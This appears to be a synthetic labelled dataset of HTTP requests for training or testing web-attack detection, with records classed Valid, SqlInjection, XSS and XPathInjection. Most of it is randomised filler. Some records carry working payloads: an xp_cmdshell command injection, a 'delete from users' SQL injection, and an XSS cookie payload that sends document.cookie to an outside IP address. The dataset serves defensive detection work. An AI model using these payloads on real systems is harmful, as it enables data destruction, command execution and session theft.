Warning: 556 www.oeriie.jpg:88588 "wf9nr6Oa" 
X-Forwarded-For: 156.12.70.0
X-Serial-Number: 47214022934711888870
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13544
Start - Id: 3777
class: Valid
GET /tH.-BHdd0XK7rm.1/ihnewz5oscl7uyhd/aNgmEO03Q.swf? HTTP/1.0
Host: 208.84.240.68
Connection: dhtfey
Accept: application/*;q=0.1
Accept-Charset: iso-8859-6, iso-8859-9;q=0.4, koi8-r, cp-950;q=0.6, utf-7
Accept-Encoding: *;q=0.0
Accept-Language: fe8snb-htEn
Cache-Control: no-transform
Client-ip: 235.59.125.79
Cookie: 4iaig2iotdol=fX@;_icmdMsb=hrp oc:2h;boit8ihrA9t4t9n=2;uIczU2zbodytb=070168969;passwdov4sam=ruXyt
Cookie2: $Version="0"
Date: Mon, 03 Nov 08 11:17:14 GMT
ETag: W/"Cw5CBzPYBcAwz@Gj"
Expect: msle9rna=tnnrdc
From: ueatims@oatosfu.net
If-Modified-Since: Mon, 09 Feb 09 12:25:50 CET
If-Unmodified-Since: Mon, 14 May 07 24:30:43 GMT
If-Match: "ueva4pVvVmpxIKVRz7AU"
If-None-Match: "ewVhSrT73W2r.R4qKb"
If-Range: Sat, 30 Aug 08 04:30:19 UTC
Max-Forwards: 10
MIME-Version: 4.3
Pragma: hc='tenk'
Proxy-Authorization: Basic cnN3bGVzbzpSc2VlaQ==
Authorization: Basic RU5zc2xpOjV0VGFtdFQ=
Range: -60328,-3384,331-
Referer: http://www.vMii0rl.ch/sewt.jsp
TE: trailers
Trailer: Transfer-Encoding
User-Agent: pEOdmrL (elrElsG; bDhkNRO8y; rsHEaozC; 2sA@k8)
UA-CPU: PowerPC
UA-Disp: 599,9039,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 0475x7705
Via: 8.6 7.92.49.237, 4.2 www.rtke.css
Transfer-Encoding: gzip
Upgrade: ae6/0.7, dwb/4.2, ltsri/6.3, aNt/0.1, 4t3eGn/0.0
Warning: 946 207.80.85.43 "ioeyradhgStlaUn1wz" 
X-Forwarded-For: 10.116.47.222
X-Serial-Number: 68867877
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3777
Start - Id: 1849
class: Valid
GET /tI8U/95-poptX/tmjSteF/rol/eadxeermaiee/nsieco40t88Lndo/rmTntimm/pXWw.c4scAvXP/uZfMnRD.css?otalycdohc5i=%2Ft&eiiwzweqait=hgda5HHIt0&sdte1=tUP%40HW0&ctd=8e&mahc9gzeIi=33&yyQM=948&Oe=k&Jes3i=4eu%26teshutdownhnevoe&wFS6MnuobjectJyechoX=2160&imgH6andxp_sF=topPhi0fssie&AeaaEfeEeTcc=2773&eOzdmafsu=ssaicqe&ctQlci5aatwsyO6=2 HTTP/1.0
Host: 162.31.246.199
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: qG2Oi-t0qtot
Cache-Control: i=gtoua9h
Client-ip: 91.1.95.32
Cookie: A2oRdfreeajie=200
Cookie2: $Version="44"
Date: Wed, 12 Mar 08 07:43:03 GMT
ETag: "Ax-jm_fdfddxcb-a"
Expect: 100-continue
From: nentele8@rc6nelreEt.be
If-Modified-Since: Sun, 06 Sep 09 17:11:08 CET
If-Unmodified-Since: Sun, 09 May 04 13:41:18 CET
If-Match: *
If-None-Match: "Vt@iEtRZKQKr2Xn"
If-Range: Tue, 28 Nov 06 11:22:04 UTC
Max-Forwards: 950
MIME-Version: 9.5
Pragma: ein6ks1d='lteTri'
Proxy-Authorization: NTLM aHV0blRvZXBhRXVxZmw0Z3MxUGVodG82Z3lldnRlb2FvY3MxOGlnbG9nbQ==
Authorization: Digest username="seSBnro"
Range: -34624,61390-055,75119-
Referer: /rSd5enyr/yt55ope/ou7des/xn2drwB.exe
TE: chunked,trailers,trailers
Trailer: Range
User-Agent: unounnmsY0oozqetia
UA-CPU: x86
UA-Disp: 868,0811,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 870x566
Via: FTP/4.3 www.eeItha1.jpeg, 5.0 www.lumxirHU.js:02, 5.9 www.fd8oS8l.jpeg
Transfer-Encoding: deflate
Upgrade: hNhon/3.1, otosd/5.7, geys/5.0, rhg/7.2
Warning: 891 118.182.25.94 "epdstea40lccSt7xiAtm" "Tue, 07 Sep 04 24:57:56 UTC"
X-Forwarded-For: 62.33.15.123
X-Serial-Number: 64954855399337418
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1849
Start - Id: 41142
class: SqlInjection
GET /exes1hndssd.shtml?nnAiyEo=linkS&dnth=18&2eeiqiA=danhvhoada&zarpsrrnrbbst2g=ie0dcC&whereYOnodeleted2Z=073&wQVPhhavinghomeG=dn2n1Bpx&xmeesin4e7ft1na=oN_sJTvFMKSx&it=74199&F9n-LAconnectOm=sriMe6&e8ae=exec+xp_cmdshell++++%27%22geBaogobe%22+++++%3E%3E++script.vbs%27 HTTP/1.0
Host: 211.252.103.69:3547
Connection: close
Accept: audio/*;q=0.5, image/*;q=0.5
Accept-Charset: iso-8859-2, cp-932, hz-gb-2312;q=0.8, windows-1257;q=0.2, koi8;q=0.8
Accept-Encoding: gzip;q=0.7, compress;q=0.3
Accept-Language: trLkEo-tmats, slhte-esjex, brGogt-7ae;q=0.7, u4aWa-tarns
Cache-Control: no-transform
Client-ip: 186.39.67.114
Cookie: oelyb4nfnnuw=av-XxZFQC
Cookie2: $Version="645"
Date: Thu, 10 Jan 08 10:33:05 CET
ETag: "3gWmZjep6Aga7L5S"
Expect: 100-continue
From: txaWstrh@gamw.fr
If-Modified-Since: Sat, 16 May 09 09:48:14 UTC
If-Unmodified-Since: Tue, 14 Jul 09 14:23:54 UTC
If-Match: "@OvZOKpmLqwcNPhkkJu"
If-None-Match: "nUC7cg0DaWfxulHtq0f"
If-Range: *
Max-Forwards: 22
MIME-Version: 7.8
Pragma: drcar='5lizntie'
Proxy-Authorization: Basic dDlsN2UzOnJnZWUyZQ==
Authorization: NTLM ZDk3M3Rlcmg3a21wdXRuaWVobWlkb29VbG9nZWF5bUU=
Range: 8796-38,34-469,9-0
Referer: http://www.renEd.uk/6ena/elak/vifc/eRe5bit.tiff
TE: gzip;q=0.4
Trailer: If-None-Match
User-Agent: Mozilla/8.0 (Windows; U; Win 9x 8.4; bm-e6; rv:2.4.7) Gecko/72854277
UA-CPU: Sparc
UA-Disp: 952,1268,32
UA-OS: FreeBSD
UA-Color: color32
Via: HTTP/2.2 www.ZusTdn.shtml:377, HTTP/1.4 www.ypaa.css:2, 0.6 119.148.86.49
Transfer-Encoding: identity
Upgrade: ng6s/4.8, 4et/8.2
Warning: 458 www.anke2uT.gif "btsiteht9hIieeLwah" 
X-Forwarded-For: 169.105.19.193
X-Serial-Number: 200032143188636
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41142
Start - Id: 41676
class: SqlInjection
GET /eEhzB88j3.Ls5/GhiNieebe6rn1/uNe8-UnZOBxD/df0j4lm/fotjtaeanwihtgratl/7gnshe6/haeiy/3suhtfoaeNrluO/d-80m4NXVkziD/e_YH9myOdERYF/muRyRctEiiRtHdGPI.jsp?X3SwDX=%3Dora&eeio0eenr=5&I5f_YV8j=19852148&rucsmitttEe=g+s%3F%3C&9fcao=sEc%40d&rh3sehaw8ny4=825280&alVPCn=re&6qtahbu=10152&JnhDv5oe=%27+++%29%3B++++delete+++++from++users%3B++commit%3B++++dummy%28+%27&OFDdtelnet=sfemAyveE9xoohaoay&sghtio9te4erhs=64498782&1wcohb5u=Jratzn&et=doswikd+tyoh%3Esseih&erreysrtsedc=%3Eye&n53j=4763 HTTP/1.0
Host: www.ssro.biz
Connection: keep-alive
Accept: text/xml;q=0.7, application/zip;q=0.2, audio/x-wav;q=0.1
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.1
Cache-Control: no-store
Client-ip: 61.151.7.134
Cookie: U98hQ=200411;msseeens=00855412;dobject1H=oh(c37 ;c3susr=r<;v66ywOrLef= ope<odoxvt copymdnph-;51rauktlzoecr=f
Cookie2: $Version="61"
Date: Sun, 23 May 04 04:03:56 GMT
ETag: "qB-FTULONUY7iO2"
Expect: yet76a=do4DczS;yi2en=hsePcye0
From: wnytdt@bdcjnzt.org
If-Modified-Since: Tue, 26 Oct 04 17:54:07 GMT
If-Unmodified-Since: Wed, 03 Dec 08 06:00:13 GMT
If-Match: "k4T5cAOEDHwaZ_Nc_"
If-None-Match: *
If-Range: *
Max-Forwards: 5
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: ne1cn l3hIf=adoal
Authorization: lrhef mar8r=0eiiUngi
Range: -91,787-299778
Referer: /srne/ales/vchws/yjigo.gif
TE: deflate,trailers,chunked;q=0.6
Trailer: Host
User-Agent: Mozilla/1.7 (X11; U; Open BSD i386 6.3; n2-iu; rv:1.6.0) Gecko/96000278
UA-CPU: MIPS
UA-Disp: 1862,8220,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 232x3893
Via: FTP/1.7 35.198.25.46, FTP/4.6 www.pdicdn.html:9
Transfer-Encoding: deflate
Upgrade: dahek/1.1, htct/7.8, rrepda/5.7, eos/3.6, uoe/1.9
Warning: 118 2.156.64.121 "naglietszhgs" 
X-Forwarded-For: 46.66.131.26
X-Serial-Number: 611965021882313
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41676
Start - Id: 46697
class: XSS
GET /1F4fh/ohcCjJP7Tnjm0aat/tQ.3qB2S6q--udHe@gU/3i/-vDdwget5locationGAB.jpeg?Zmz1zA=7a2+&execxp_dZkPt_@e=ijGu&orbLAWI-WO=iy%3FyioeAtelnet&DW-@aah_=vnn&n8tr=rO+s9aiGtn7tua&lz1=3794464902&GUc.eO=homeip%27oi%5B8A%28nhl&t5c4ioilveh=6556&tcRvnnieo=+h&leugxlw=fa&efpiioasui=80THgX&S9evtoe=92 HTTP/1.1
Host: www.ole8d.it:80
Connection: w4matlO
Accept: */*
Accept-Charset: iso-8859-4, iso-8859-5, windows-1254;q=0.7, windows-1255;q=0.3
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: min-fresh=1
Client-ip: 36.116.63.20
Cookie: eaoig2e=ul8mta3o7cIo;g9trgfisea=0Lz;e23ptiM=<div  style =   "     width:   expression([window.open('http://42.160.106.88/niittr.sh'+document.cookie);]);   " >
Cookie2: $Version="000"
Date: Thu, 27 Apr 06 12:18:34 CET
ETag: "8kIyhP-mNC_ONgZ2r"
Expect: 100-continue
From: sydmNoRr@eYicvet9.com
If-Modified-Since: Wed, 15 Feb 06 14:18:24 UTC
If-Unmodified-Since: Tue, 27 Mar 07 23:42:41 CET
If-Match: "IlrUh4ateStNiD1mOQ"
If-None-Match: *
If-Range: "EZIVtdbFAq@lv1Sw"
Max-Forwards: 116
MIME-Version: 6.9
Pragma: no-cache
Proxy-Authorization: ttnoUO ieSeltd=irDSbek
Authorization: swcf F3oah=obeJ
Range: -765,788-
Referer: /tdLwt/hxstv9U/sqgtC/5prrtce.pdf
TE: trailers
Trailer: If-Match
User-Agent: Mozilla/0.4 (X11; U; Open BSD i386 0.0; re-xl; rv:2.6.9) Gecko/12798797
UA-Disp: 733,0312,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 007x164
Via: 9.2 162.209.185.141, 8.5 www.tFnnee.css
Transfer-Encoding: tisbee; ro1eeeh=rkTu
Upgrade: oa7ner/6.8, tdsyot/0.1, lom/8.5
Warning: 905 www.seauzsf.jpeg "Tdiereitiwn54deIa" 
X-Forwarded-For: 254.88.178.244
X-Serial-Number: 9170068717
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46697
Start - Id: 17901
class: Valid
GET /joik/esalntnos2niesfo/RXiElcchUyDa7/x0tltuabee/1B.gif?EJ64V_ZUQ5-g=56092775&sujerita=hh&SkhQt6ZRnph-cf=eosswpnoidcprNs&6yh=e7EI HTTP/1.1
Host: 118.227.49.139
Connection: close
Accept: video/*, video/*, audio/*
Accept-Charset: windows-1251, euc-cn;q=0.6, windows-874;q=0.6
Accept-Encoding: identity, compress;q=0.3, gzip, deflate;q=0.8, gzip
Accept-Language: *
Cache-Control: no-transform
Client-ip: 90.81.217.94
Cookie: uwy87ensq7vatqt=8xoioxei
Cookie2: $Version="10"
Date: Sat, 17 Jan 09 06:56:25 CET
ETag: W/"rawowBGsxwOeMNHwDQD"
Expect: shernS8
From: rdny@hctpuostk.cz
If-Modified-Since: Tue, 29 May 07 08:09:15 CET
If-Unmodified-Since: Mon, 08 Feb 10 10:49:48 CET
If-Match: "fKtB.5VUBzV_@ObM"
If-None-Match: *
If-Range: *
Max-Forwards: 36
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: Basic dGV0ZUk6ZGxpdg==
Authorization: aahT fAd7=onn2sth
Range: -299
Referer: /ypytq4sT/smej6r/1d6taRty/Epae.aspx
TE: trailers,chunked
Trailer: Max-Forwards
User-Agent: Mozilla/4.6 (X11; U; Open BSD i386 8.6; ws-el; rv:4.5.2) Gecko/71113038
UA-CPU: Sparc
UA-Disp: 427,601,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 523x1389
Via: r7iOi/8.6 166.193.179.240
Transfer-Encoding: identity
Upgrade: tigP/7.0
Warning: 737 27.95.14.86 "Soaoayayt4nrwenZO" 
X-Forwarded-For: 188.200.228.132
X-Serial-Number: 4786268
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17901
Start - Id: 8138
class: Valid
GET /tworotiuyhheee/oMoRyvCuzP/cNpLL@ms/wMaLil1R/tKShe/3or/1aia/ens8U/aMyrurDR1eY/enwl.dll? HTTP/1.1
Host: www.Tinylmr9yo.gov:80
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: *
Accept-Language: 46buau-sitdeh;q=0.3, ritihs2v-tdI, ohiaihiu-DeA1;q=0.5, tezcl2o-0tceitcj;q=0.6
Cache-Control: max-age=825
Client-ip: 226.231.245.62
Cookie: crl=9165420;pu1sfFcIspouely=Ate
Cookie2: $Version="0"
Date: Wed, 19 May 04 23:42:08 UTC
ETag: W/"5a_z@8KhYS8Fiyr"
Expect: hwptt40
From: bHa9Ixr@cydbhep.be
If-Modified-Since: Sun, 11 May 08 01:10:09 CET
If-Unmodified-Since: Thu, 18 Mar 04 11:43:51 GMT
If-Match: "jfaZ9VwEI2VvralVDYh"
If-None-Match: "rk-OQq4_ljd-R2aUH5A"
If-Range: Mon, 02 Feb 09 21:08:28 GMT
Max-Forwards: 6544
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: a3rnzn odtams=nres
Authorization: NTLM ZU9waGdqaHdobzIybXN3aWJnb2hwYXpjZWk1d2wzaWxldHBlaGVwZUFkdWtu
Range: 709604-1057,992-83930,5346-645
Referer: http://ehrehtn.st/addov/60s6oaTc.php4
TE: trailers,chunked,trailers
Trailer: TE
User-Agent: iolohei (n2AgT1; nsLlC_G; sffCoa0WH; ebo_@Gw; iAzOMTRW)
UA-CPU: StrongARM
UA-Disp: 4611,8979,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 997x477
Via: 9.2 www.rpas.shtml:70786
Transfer-Encoding: compress
Upgrade: 2eUjto/5.2, tqac/7.0, p0oik/8.4, 1mkNa/0.5
Warning: 489 www.eptt.jpg "7ceEepaUoi6" "Mon, 12 Oct 09 20:07:00 CET"
X-Forwarded-For: 17.216.217.132
X-Serial-Number: 7042909990
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8138
Start - Id: 29923
class: Valid
GET /sQ21A1a/r29fFgkKhF@HRUdZe6/tmhckrj/iopenwkE7AdzNZo/n10wY8tVA_YyRdU/esf2BzFFq4n5/sd./wtQr.swf? HTTP/1.1
Host: www.Y8lrscgi.ch:692
Connection: teaa
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: gzip
Accept-Language: *;q=0.0
Cache-Control: no-cache
Client-ip: 155.226.135.123
Cookie: coirHnx=8389
Cookie2: $Version="87"
Date: Wed, 20 Oct 04 05:31:29 CET
ETag: "@AvUXGrH1Q6w7fid"
Expect: hvcbsn=mcurunea;tehe=hdouis
From: enAenar@sxZibNudi.uk
If-Modified-Since: Tue, 31 Mar 09 01:44:52 UTC
If-Unmodified-Since: Fri, 11 Mar 05 07:02:45 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 04 Jan 07 07:49:00 GMT
Max-Forwards: 9732
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: Basic RGlvYWw6b244eXJS
Authorization: NTLM aWZubGFwam53c2VJMUV1ZW84dXJvcnNzYWNxdXRlZW5ucm5tOUVlbWFibg==
Range: 70-
Referer: /0nh8r3ph/w3dEieTi/rjA7/aibjy/ReelNas.jpeg
TE: trailers,trailers
Trailer: Pragma
User-Agent: Mozilla/4.6 (Windows; U; Windows NT 5.2; ps-ha; rv:3.9.3) Gecko/23342287
UA-CPU: StrongARM
UA-Disp: 5197,782,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 3511x216
Via: HTTP/7.3 www.ooeeain.html
Transfer-Encoding: eeYrny; kwaeeqax=sqtt
Upgrade: onb4/4.3, rcs/3.8, osine/7.9
Warning: 638 www.lba6espt.jpeg:1313 "DhxO" 
X-Forwarded-For: 180.53.116.218
X-Serial-Number: 89410
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29923
Start - Id: 34283
class: Valid
PUT /Eh/9i1t9sJNemePsie/dtdh5oGh19lrYa/iDI6OlrtoCtw8tduito/Enwqpnegedst3a/tTWaYFV5bKnNBMEqw/2C/eaPpWCIhjcl/s0iits/6WKzThJcxxZ/teoshrkretosl4i/XB3.htm? HTTP/1.0
Content-Length: 71
Content-Language: uI,adAnea
Content-Encoding: compress
Content-Location: http://hrfqk.com/oeBiisQ/06sfthka/mbOseehe.bin
Content-MD5: b25udEdlamVEaTB1aWdyZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sat, 11 Oct 08 19:14:08 GMT
Last-Modified: Wed, 24 Nov 04 18:39:08 UTC
Host: 86.185.164.166
Connection: close
Accept: */*;q=0.0
Accept-Charset: utf-8;q=0.8, x-mac-japanese, big5;q=0.3, iso-8859-9
Accept-Encoding: 
Accept-Language: nee8b1cw-hn4ielz;q=0.5, ee-wsetye, ad9-tiona
Cache-Control: no-transform
Client-ip: 140.199.18.248
Cookie: 0O3Q=3tctd3eoerg );E0sdelete=tr;FCi-S2all7Go=rbin
Cookie2: $Version="3"
Date: Sat, 25 Aug 07 18:17:13 UTC
ETag: W/"aoFIsLpdV3MMOaU-zFaZ"
Expect: figcY=GgNe;hyOaMl=Ncdseiei
From: oAnrisas@onr4ieTtb.org
If-Modified-Since: Tue, 08 May 07 13:01:27 CET
If-Unmodified-Since: Fri, 17 Apr 09 05:22:27 CET
If-Match: *
If-None-Match: "YHolwR9r4zLVdfU"
If-Range: Fri, 10 Nov 06 16:10:10 CET
Max-Forwards: 054
MIME-Version: 7.7
Pragma: titjg=av7
Proxy-Authorization: NTLM aWNpbm9ybG5UMm9tMW1odEF0YXRlaGJ0dHRlZUVvdG5odGFBZA==
Authorization: NTLM ZXVsTk5ydm5tc3Rkb3JkYU9uYW9SbE5pdHNtaXU3YWRhckFzZW5t
Range: 623758-,70-
Referer: http://namia.uk/ueDhEs.sh
TE: trailers,trailers
Trailer: Max-Forwards
User-Agent: letto/8.3
UA-CPU: Sparc
UA-Disp: 693,674,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 1417x508
Via: 3.0 www.titi8miT.gif, FTP/7.1 www.saEte.jpeg
Transfer-Encoding: itics; nfdfs8=d4tCvai
Upgrade: onuaa/7.8, tZmef/6.9, uhou/2.5, grup6/7.0
Warning: 747 www.rupsv.jpeg "or6huby4shoei4num" "Fri, 15 May 09 12:35:53 CET"
X-Forwarded-For: 23.54.143.100
X-Serial-Number: 437295181628210
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

msrefCseooos=s&etlrtny=ecoA'mexaDypasswd6f&a2wh=nWielrdic&Gwp-C_=ilJg

End - Id: 34283
Start - Id: 10683
class: Valid
GET /tpJh_vLZ/iaex/iaebiiepioraproo8v0n/aQxNiw-jMH92/ztnltnEfTumrsemex/tle/th9HOuVQwb9.t.htm?wt7iuecnegxbecu=esmleefntCsouyi&nqvf=rX06TuEh4d5&yW.fR2bY-=flrEi&t7aaisn=rNVf&u5l9oweephts00=aXDDw5PE8Ugr&liate=gachildulei0hsecqf&tjieigtanapnt=7452&ttOenhrlMenc=s%26e&cd=07366149&o0oaocv0ianAe=t-isFDR.&snksnEr5=eIOt15clabfwEmQ HTTP/1.0
Host: 106.196.245.207
Connection: xevaanes
Accept: video/*;q=0.7
Accept-Charset: windows-1253;q=0.5, x-mac-roman;q=0.9
Accept-Encoding: compress, gzip;q=0.9, deflate;q=0.2
Accept-Language: zz-meefnp
Cache-Control: no-cache
Client-ip: 245.69.51.123
Cookie: dm8s6Gereao=0750040;zAPdlocationl=8;3e=55
Cookie2: $Version="902"
Date: Thu, 24 Sep 09 04:52:10 CET
ETag: "c7TaWn1qmplrGR5OVY"
Expect: 100-continue
From: spyi@hEtfsnh.ch
If-Modified-Since: Wed, 28 Nov 07 04:46:54 UTC
If-Unmodified-Since: Sun, 04 Nov 07 09:40:20 UTC
If-Match: "@v5Q5eXotlcRj0xv"
If-None-Match: *
If-Range: Thu, 26 Jun 08 20:23:24 GMT
Max-Forwards: 4
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: Basic YW5uTnNhYzp3c2Vvd3Nz
Authorization: NTLM dWxsdG90bmNWbTJzeU51ZXVpaWJhZGRlZHNhYTBuMXN0ZWYybmM=
Range: 9268-2780
Referer: /arhBra7B/eiiue3iN.png
TE: trailers
Trailer: Accept-Language
User-Agent: Mozilla/5.7 (compatible; Konqueror/1.0; SunOS sun4u; ahhsa)
UA-CPU: 68000
UA-Disp: 8769,6775,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 6678x842
Via: 5.3 www.Rb9eet7.gif, 2.4 www.ig4sev.tiff, 7eGrI/0.7 www.a1tej6.gif
Transfer-Encoding: gzip
Upgrade: 7wR38/2.1, n4l/0.4
Warning: 956 www.dDaes.jpg "taiUihonr" "Fri, 26 Nov 04 05:45:18 UTC"
X-Forwarded-For: 215.193.123.101
X-Serial-Number: 61836030943693836544
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10683
Start - Id: 28277
class: Valid
GET /x6C/fKMRQnullPzn.k/uSa0tukF1sigt/Ed5A_NbinF/t0f/nWI/xisZnA.9oqjLf4sKlH/eRPunKXg52/tmpHGUobjectWLvo-5/kD4aJWclC2aK1o.nsf?rlsebinrJTtmp-access_log=o.Pssu9R&ynhiahn=%2Bcto&l7stAsoif4g=r%7Eda%5ChchUnt&QT.Z=r8mnsopcIda&kktSeehrtlErbto=34461&esao90rhh7j=tH8nt6e+seer&rje3w=gInEsud7otrnsam&e6=ets3o6Dexoerrnl&sujln65o=aumeta+htrj&GL1vbscript1q=akQnnQ&Lw.DJt@i=28&1awaiames=400715&6xNWzOXr-gPw=rxyis&Jcets=11&dsa=g%2B%5D HTTP/1.1
Host: www.safhet.cz
Connection: keep-alive
Accept: image/gif;q=0.6, image/*;q=0.5, text/*;q=0.9
Accept-Charset: iso-8859-6, euc-kr;q=0.6, iso-8859-7, euc-cn;q=0.6, iso-8859-5
Accept-Encoding: deflate;q=0.8, compress
Accept-Language: *
Cache-Control: no-store
Client-ip: 79.12.235.104
Cookie: QM1mtVAjOR=;emar
Cookie2: $Version="5"
Date: Thu, 05 Jan 06 15:07:30 GMT
ETag: "2fXL_y5bCBBhA@GLyTH"
Expect: nsbpva=di6mmt;NdIws
From: Elo5h@esedtsi8.net
If-Modified-Since: Sun, 30 Sep 07 13:18:07 CET
If-Unmodified-Since: Fri, 09 Apr 04 09:31:22 UTC
If-Match: "RJr-TwwOQO-qob6"
If-None-Match: "Mizh0QUgIkvUxDy4"
If-Range: Mon, 16 Jul 07 12:52:24 UTC
Max-Forwards: 08
MIME-Version: 4.5
Pragma: s='t'
Proxy-Authorization: eotn c3ei=whZbs
Authorization: Digest qop=cntodraz
Range: 3-15771,8-
Referer: /ebznd/5ueto/eslc/ceirite.ace
TE: trailers
Trailer: Referer
User-Agent: eoClg/5.2.3.7
UA-CPU: Sparc
UA-Disp: 5435,696,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 891x280
Via: FTP/6.9 www.joctTt.png:8247, Aetu2/5.1 141.157.52.92
Transfer-Encoding: ealne; entAeIt=r3xetse
Upgrade: iaRtso/6.7, aakyo/7.1, oash/9.5, mwdp/3.3
Warning: 207 www.iRadateo.png "Hkr6Ecnpnearvdrttm" "Thu, 13 Aug 09 17:46:46 CET"
X-Forwarded-For: 209.67.183.110
X-Serial-Number: 59455788287965152
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 28277
Start - Id: 20827
class: Valid
GET /etsirha8k3/C95DNH.jpeg?emyR=aT5 HTTP/1.0
Host: www.edSotaor.cz
Connection: close
Accept: */*;q=0.4
Accept-Charset: utf-8, isiri-3342, macintosh;q=0.2, windows-1258
Accept-Encoding: *
Accept-Language: *;q=0.3
Cache-Control: min-fresh=7617
Client-ip: 187.246.147.234
Cookie: nexjnail=61;yTnh=ndcwe;lg=s>n
Cookie2: $Version="2"
Date: Sat, 11 Apr 09 07:52:56 UTC
ETag: W/"5eYRdFZh_d3T0SHes67"
Expect: mdign=5hifmLe
From: itbAy3@24cao.it
If-Modified-Since: Fri, 15 Sep 06 07:44:39 UTC
If-Unmodified-Since: Mon, 03 Aug 09 13:57:34 CET
If-Match: "WM-ghVO06ttY_IJij3h"
If-None-Match: *
If-Range: "NsY.21w_xbb-wgwC03b"
Max-Forwards: 25
MIME-Version: 3.8
Pragma: ogqte=n
Proxy-Authorization: oCeaVw h5ecsw=ezyieu
Authorization: xnem eahs=0nmz
Range: 72115-,9-3120,919774-69202
Referer: http://tj0tt.biz/iesnIT.wmn
TE: gzip;q=0.9,deflate
Trailer: TE
User-Agent: Mozilla/7.9 (X11; U; Open BSD i386 7.2; Lw-or; rv:7.2.0) Gecko/75778847
UA-CPU: 68000
UA-Disp: 7276,7233,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 3856x4150
Via: FTP/6.9 www.posoNIm.html, 5.2 101.99.10.1, 1.6 www.4yale.shtml:56068
Transfer-Encoding: deflate
Upgrade: nfoEet/4.4, cNiaOe/9.4
Warning: 765 186.65.136.9 "kes3cga1t4maesoo" "Mon, 23 Nov 09 01:50:54 CET"
X-Forwarded-For: 196.176.140.95
X-Serial-Number: 390733
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20827
Start - Id: 28423
class: Valid
GET /wNEysk9B70aS406/lrteure5hwEa7/Oerydh/aiue6a2dianoi/uasm/ob/oard/erenso2r99tef6ea/ivVSY3dIMxZDJcY4.tl/nS.php3?0nicTG=aGloC&EEsammform=89143490&MQRoVDobjectUEY=%28w%24nktp%28em&v0xapSst=ah%251o%28jmurme%27i&bin3HFg=1638&93d9eudAa=passwdat&eu8s=rRo11ainetltle&tnnOadebg2hu=lnudhl&4Md5i=79&rszdjsOgpbwat=tBE&toeOz1ad8xeaLz=186 HTTP/1.1
Host: 188.133.233.152:80
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: *;q=0.8
Cache-Control: min-fresh=348
Client-ip: 218.83.162.0
Cookie: s3a3hddhNstUcpE=opt(cu;a41iyp=880593513;66b=50;oerjii=Nnb8hoe k;ta3mn4twxa=26235
Cookie2: $Version="01"
Date: Wed, 21 Jun 06 13:33:29 UTC
ETag: W/"1gX9YQdgjmVgQfs"
Expect: 100-continue
From: oBcae9t@txO3eond.biz
If-Modified-Since: Wed, 07 Mar 07 02:00:06 GMT
If-Unmodified-Since: Tue, 24 Mar 09 15:25:34 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 22 Dec 07 24:39:23 UTC
Max-Forwards: 5
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: Basic TDcxeWh0OmV0N2F0bmVl
Authorization: Digest nonce
Range: 9246-,43437-,-51100
Referer: /Ilnlah9/ahy9/Donst/pxiMahSa.mdb
TE: trailers
Trailer: If-Range
User-Agent: a5htd (6RF.Kf@d)
UA-CPU: PowerPC
UA-Disp: 4475,557,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 6329x3487
Via: 1.4 www.eaty2w.html, HTTP/9.7 www.Sodkzny.png, 14gina/3.8 www.iace.jpg
Transfer-Encoding: 683imA; lx0dPto=iimpwmse
Upgrade: fioa/5.4, weeo/7.8, l0s/3.4, srerh/3.7
Warning: 999 www.inZhH.jpeg:2 "ret1" 
X-Forwarded-For: 7.153.57.18
X-Serial-Number: 15983235
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28423
Start - Id: 49819
class: XPathInjection
